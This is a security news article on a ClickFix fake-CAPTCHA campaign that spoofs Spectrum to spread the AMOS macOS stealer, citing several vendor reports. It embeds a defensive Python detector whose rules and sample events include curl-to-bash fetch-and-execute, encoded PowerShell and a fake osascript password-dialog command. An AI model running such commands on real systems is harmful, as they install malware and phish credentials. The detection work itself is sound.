Cybersecurity researchers are warning of a new malware campaign that uses the ClickFix social engineering tactic to trick users into downloading an information stealer known as Atomic macOS Stealer (AMOS) on Apple macOS systems.
The campaign, according to CloudSEK, leverages typosquat domains mimicking the U.S.-based telecom provider Spectrum.
“macOS users are served a malicious shell script designed to steal system passwords and download an AMOS variant for further exploitation,” security researcher Koushik Pal said in a report published this week. “The script uses native macOS commands to harvest credentials, bypass security mechanisms, and execute malicious binaries.”
The activity is believed to be the work of Russian-speaking cybercriminals, owing to the presence of Russian-language comments in the malware’s source code.
The starting point of the attack is a web page that impersonates Spectrum (“panel-spectrum[.]net” or “spectrum-ticket[.]net”). Visitors to these sites are shown a message instructing them to complete an hCaptcha verification check in order to “review the security” of their connection before proceeding.
However, when the user clicks the “I’m human” checkbox, they are shown an error message stating “CAPTCHA verification failed,” urging them to click a button to proceed with an “Alternative Verification.”
Doing so silently copies a command to the user’s clipboard, and the victim is shown a set of instructions that depends on their operating system: Windows users are told to open the Windows Run dialog and run a PowerShell command, while macOS users are told to open the Terminal app and run a shell script.
The shell script, for its part, prompts the user for their system password and downloads the next-stage payload, in this case the known stealer Atomic Stealer.
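The execution step described above has a useful property for defenders: the payload is launched by the victim's own interactive session (the Run dialog spawns from explorer.exe; Terminal launches the shell), and its command line immediately fetches, decodes or executes something remote, or asks for a password. The following Python is an added example, not code from CloudSEK, Darktrace or this article. It scores EDR-style process-execution records for that combination. The record shape, the process names, the regex indicators and the sample events are all constructed assumptions; none of the strings are indicators taken from the reports.

```python
"""Heuristic detection of ClickFix-style "paste this into Run/Terminal" executions.

Added example (not the article's or any vendor's code). It scores
process-execution records for: an interpreter launched from the user's own
interactive session whose command line fetches/decodes/executes a remote
payload or throws up a password dialog. The record shape and process names
are assumptions about what an EDR would report; sample events are constructed.
"""
import re
from dataclasses import dataclass, field


@dataclass
class ProcessEvent:
    platform: str   # "windows" or "macos"
    parent: str     # parent image name as reported by telemetry (assumption)
    image: str      # image name of the new process
    cmdline: str


@dataclass
class Finding:
    event: ProcessEvent
    score: int
    matched: list = field(default_factory=list)


# Parents meaning "the user launched this by hand": the Run dialog spawns
# children from explorer.exe; on macOS we assume the telemetry reports the
# terminal application rather than the intermediate login shell.
INTERACTIVE_PARENTS = {
    "windows": {"explorer.exe"},
    "macos": {"terminal", "iterm2"},
}

# Interpreters the lure tells the victim to paste into.
INTERPRETERS = {
    "windows": {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"},
    "macos": {"sh", "bash", "zsh", "osascript"},
}

# (name, pattern, weight). Generic download-and-execute idioms, not campaign IOCs.
RULES = {
    "windows": [
        ("encoded_command", re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
        ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 1),
        ("bypass_policy", re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I), 1),
        ("download_execute", re.compile(r"\b(?:iex|invoke-expression|downloadstring|invoke-webrequest|irm)\b", re.I), 2),
        ("mshta_remote", re.compile(r"mshta(?:\.exe)?\s+https?://", re.I), 3),
    ],
    "macos": [
        ("curl_pipe_shell", re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:sh|bash|zsh)\b", re.I), 3),
        ("base64_decode", re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b"), 2),
        # The script is described as prompting for the system password; an
        # AppleScript dialog with a hidden answer is the usual way a script does
        # that (an assumption about the implementation, not taken from the report).
        ("password_dialog", re.compile(r"osascript.*display dialog.*(?:hidden answer|password)", re.I), 4),
        ("background_or_nohup", re.compile(r"\bnohup\b|&\s*$"), 1),
    ],
}


def score_event(ev: ProcessEvent, threshold: int = 4):
    """Return a Finding when the event looks like a pasted ClickFix payload, else None."""
    plat = ev.platform.lower()
    if plat not in RULES:
        return None
    # Only hand-launched processes count: the same command line run by a
    # service or scheduled task is a different detection problem.
    if ev.parent.lower() not in INTERACTIVE_PARENTS[plat]:
        return None
    if ev.image.lower() not in INTERPRETERS[plat]:
        return None
    matched = [name for name, rx, _ in RULES[plat] if rx.search(ev.cmdline)]
    score = sum(w for name, _, w in RULES[plat] if name in matched)
    if score < threshold:
        return None
    return Finding(ev, score, matched)


def scan(events, threshold: int = 4):
    """Apply score_event to every record and keep the hits, in input order."""
    return [f for f in (score_event(e, threshold) for e in events) if f is not None]


# Constructed sample telemetry. The base64 blob is filler; URLs use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    ProcessEvent("windows", "explorer.exe", "powershell.exe",
                 "powershell -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAu"),
    ProcessEvent("macos", "Terminal", "bash",
                 "bash -c 'curl -fsSL http://example.invalid/p.sh | base64 -d | bash'"),
    ProcessEvent("macos", "Terminal", "osascript",
                 "osascript -e 'display dialog \"macOS needs your password to continue\" default answer \"\" with hidden answer'"),
    ProcessEvent("windows", "explorer.exe", "powershell.exe",          # benign admin one-liner
                 "powershell.exe -NoProfile -Command Get-ChildItem C:\\Users"),
    ProcessEvent("macos", "Terminal", "zsh",                           # benign download, no execution
                 "zsh -c 'curl -fsSL https://example.invalid/release.tar.gz -o release.tar.gz'"),
    ProcessEvent("windows", "svchost.exe", "powershell.exe",           # not user-launched: out of scope
                 "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAu"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.event.platform:8} score={f.score} {f.matched} :: {f.event.cmdline[:60]}")
```

The clipboard contents never appear in endpoint telemetry, so the signal has to come from provenance (an interactive parent) combined with what the pasted command does. Developers who legitimately run `curl | sh` installers from a terminal will trip the macOS rule; tune the threshold or weights per fleet rather than suppressing the rule, because the `explorer.exe`-to-PowerShell-with-encoded-command path in particular has almost no legitimate use on a managed workstation.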
“Poorly implemented logic in the delivery sites, such as mismatched instructions across platforms, points to hastily assembled infrastructure,” Pal said.
“The delivery pages in question for this AMOS variant campaign contained inaccuracies in both their programming and front-end logic. For Linux user agents, a PowerShell command was copied. Additionally, the instruction ‘Press & hold the Windows Key + R’ was displayed to both Windows and Mac users.”
The disclosure comes amid a surge in campaigns using the ClickFix tactic to deliver a wide range of malware families over the past year.
“Actors carrying out these targeted attacks typically utilize similar techniques, tools, and procedures (TTPs) to gain initial access,” Darktrace said. “These include spear phishing attacks, drive-by compromises, or exploiting trust in familiar online platforms, such as GitHub, to deliver malicious payloads.”
The links distributed through these vectors typically redirect the end user to a malicious URL that displays a fake CAPTCHA verification check, deceiving users into thinking they are doing something innocuous when in reality they are being guided to execute malicious commands to fix a non-existent issue.
The end result of this effective social engineering method is that users compromise their own systems, enabling threat actors to bypass security controls.
The cybersecurity company said it identified several ClickFix attacks across customer environments in Europe, the Middle East, and Africa (EMEA) and in the United States. These campaigns are gaining steam, appearing in several variations but sharing the same end goal of delivering malicious payloads, ranging from trojans to stealers to ransomware.
Earlier this week, Cofense outlined an email phishing campaign that spoofs Booking.com, targeting hotel chains and the food services sector with fake CAPTCHAs that lead to XWorm RAT, PureLogs Stealer, and DanaBot. The fact that ClickFix is versatile and easy to adapt makes it an attractive malware distribution mechanism.
“While the exact email structure varies from sample to sample, these campaigns generally provide Booking[.]com-spoofing emails with embedded links to a ClickFix fake CAPTCHA site which is used to deliver a malicious script that runs RATs and/or information stealers,” Cofense said.
The email security firm said it has also observed ClickFix samples mimicking cookie consent banners, where clicking the “Accept” button causes a malicious script file to be downloaded. The user is then prompted to run the script in order to accept cookies.
In one April 2025 incident analyzed by Darktrace, unknown threat actors were found to use ClickFix as an attack vector to download nondescript payloads that burrowed deeper into the target environment, conducted lateral movement, sent system-related information to an external server via an HTTP POST request, and ultimately exfiltrated data.
“ClickFix baiting is a widely used tactic in which threat actors exploit human error to bypass security defenses,” Darktrace said. “By tricking endpoint users into performing seemingly harmless, everyday actions, attackers gain initial access to systems where they can access and exfiltrate sensitive data.”
Other ClickFix attacks have employed phony versions of other popular CAPTCHA services, such as Google reCAPTCHA and Cloudflare Turnstile, for malware delivery under the guise of routine security checks.
These fake pages are “pixel-perfect copies” of their legitimate counterparts, sometimes even injected into genuine but compromised websites to trick unsuspecting users. Stealers such as Lumma and StealC, as well as full-fledged remote access trojans (RATs) like NetSupport RAT, are among the payloads distributed via bogus Turnstile pages.
“Modern internet users are inundated with spam checks, CAPTCHAs, and security prompts on websites, and they’ve been conditioned to click through these as quickly as possible,” SlashNext’s Daniel Kelley said. “Attackers exploit this ‘verification fatigue,’ knowing that many users will comply with whatever steps are presented if it appears routine.”